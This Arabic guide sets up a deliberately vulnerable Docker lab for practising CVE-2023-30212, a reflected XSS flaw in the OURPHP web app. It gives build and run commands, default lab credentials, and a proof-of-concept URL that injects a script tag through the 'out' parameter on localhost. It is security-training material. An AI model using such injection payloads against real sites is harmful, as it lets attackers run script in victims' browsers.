
بيئة ضعيفة مبنية على Docker لممارسة استغلال ثغرة CVE-2023-30212، تتضمن تطبيق ويب OURPHP مع ثغرة XSS منعكسة للتدريب الأمني.
git clone https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-.git
الآن لإعداد صورة دوكر
استخدم الأمر sudo docker build -t work .
استخدم الأمر sudo docker run -d -p 80:80 work
الآن سنحصل على معرف الحاوية
اذهب إلى المتصفح وابحث عن localhost ; 127.0.0.1
الآن استخدم بيانات الدخول
اسم المستخدم : root
كلمة المرور : docker
قاعدة البيانات : work
اسم المستخدم : work كلمة المرور : work
اذهب إلى الرابط http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
سنحصل على رسالة تنبيه تحتوي على "xss".